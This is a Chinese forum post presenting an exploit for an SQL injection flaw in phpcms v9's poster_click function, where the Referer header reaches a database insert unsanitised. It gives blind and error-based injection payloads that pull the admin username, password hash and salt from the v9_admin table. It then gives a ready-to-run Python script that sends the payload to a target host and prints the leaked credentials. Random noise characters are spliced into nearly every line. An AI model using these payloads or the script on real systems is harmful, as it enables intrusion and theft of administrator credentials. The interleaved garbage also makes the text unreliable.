有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:" S3 y+ X: X0 O1 S
: K, V$ P& q. F' E5 }; m; R问题函数\phpcms\modules\poster\index.php
% o2 S n4 r* m7 D; U" m# S: Y- ^6 h8 Z- K" k# E
public function poster_click() {3 I, k$ s1 K) j9 y# M/ v; |& @
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
. L, X8 d( ^- e$ M: s0 G! a; s$r = $this->db->get_one(array('id'=>$id));6 \! U2 m7 l7 H, q$ h) Y% O
if (!is_array($r) && empty($r)) return false;
8 S& L) `4 p3 _+ l/ S$ip_area = pc_base::load_sys_class('ip_area');% ~0 l: ?! S o8 l
$ip = ip();
4 b2 Z4 _ {8 ^4 U Y B- y, k$area = $ip_area->get($ip);, \7 _( j- Y8 L
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
% E' l. {7 h0 i9 K$ z0 h/ H# ~9 dif($id) {
. q/ p5 b" U9 p0 K9 u# C) L4 u- H) ?$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
- A' @) @6 T5 X, u; M2 Y$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));2 m1 p% V+ `. X% ]+ y+ f3 s( ]
}; r+ g+ ?% I" F \6 x+ @8 V
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));0 F2 I4 [' P3 ^ N
$setting = string2array($r['setting']);
; f# b! y4 U% z; s) _/ ]; wif (count($setting)==1) {
+ X+ s0 t/ v4 `/ _7 G* w; S5 F. g$url = $setting['1']['linkurl'];- R3 W& {# D0 ]# U
} else {# c$ ~4 O' f' x
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
; F: Z0 L+ F I" }}
! q2 { t8 q% }0 eheader('Location: '.$url);' y8 o/ r% O5 O
}& Y2 R! l) _5 R, I$ I0 ?6 p$ a
( q/ b+ e9 _! ]2 M* f7 S7 l# V
; L% T, z) L; x0 N `& L$ V
" C; T# y1 f* e- N5 q; j
利用方式:( L& Q0 r6 \8 V1 N+ A# H8 b' j4 i6 m
R! h) ~4 a" u3 `' A1、可以采用盲注入的手法:
8 ^, b" Z* S/ \4 J
/ e2 h# z) H$ M# N0 Xreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#; `7 S- X/ f1 B' Z3 Y' ^
$ s' V, r9 Q. p& E; _1 X
通过返回页面,正常与否一个个猜解密码字段。
( k8 F7 F% R, F
8 x1 a S! i/ {" l, q* I7 U9 b2、代码是花开写的,随手附上了:1 y& K" Z; C% h
5 e' ?( e- C3 D+ x
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#0 O# T3 S, W8 b1 e& H
, O7 f, Z2 j* W/ s此方法是爆错注入手法,原理自查。
$ r* E. S& c+ } y2 c2 k7 Z0 }4 h
L0 |# F5 S( h0 y' u% c o8 e9 Q+ U0 a
利用程序:
9 a8 E1 ~% i( E: Q. h+ r8 g8 ~
! @2 R7 N8 U' p7 [! L( d#!/usr/bin/env python0 e9 K/ h3 j% p, u0 {5 z
import httplib,sys,re
, f* }9 q4 U3 }% W; r) X. P+ f" q/ |& |( W
def attack():. Z2 m( z) ?9 L+ \7 Y
print “Code by Pax.Mac Team conqu3r!”
% @' `6 A p5 Y7 ]2 X4 n a: j, Rprint “Welcome to our zone!!!”
" V j3 v5 h6 _8 y3 F% surl=sys.argv[1]9 w1 x# D' R L! j. v
paths=sys.argv[2]
1 U1 G7 m, L2 `- f5 yconn = httplib.HTTPConnection(url)
5 `* Z( @; \9 h, S. m( s6 ai_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
- S! X7 r0 v0 U7 D9 p, W6 d“Accept”: “text/plain”,
8 E2 T! q( p8 w0 h; ~“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}/ @1 n" H1 i) @7 x- s* y
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
8 z/ e2 X4 L( h* yr1 = conn.getresponse()
$ w) }( v2 {& ~datas=r1.read()' t$ Z- }& A+ W8 i, {& c; F7 {4 ]
datas=re.findall(r”Duplicate entry \’\w+’”, datas) j( C, @7 ?" E4 e' B# n" O/ ~1 D& f
print datas[0]* M W% q9 Y6 K# v
conn.close()
6 @7 ^9 ^& N. K/ {$ j+ H6 C8 Eif __name__==”__main__”:8 k$ ^+ q0 B! U M) x) Y, p2 g; d
if len(sys.argv)<3:) Q* I$ B. p0 w. W( W' h# a
print “Code by Pax.Mac Team conqu3r”- n2 g2 H1 E/ p- b4 {! W
print “Usgae:”
! A7 P' N; `" G6 m1 G/ lprint “ phpcmsattack.py www.paxmac.org /”9 K7 p$ ]" {" N0 C& U( m
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
$ U5 l, a& m# d; T" I5 @5 xsys.exit(1)' S" t' J% `! ^7 @: u
attack(): d l% ?+ D1 h `% p
8 O) j3 y# i& f8 G' @
|
发表于 2013-1-11 21:01:00
收藏
支持
反对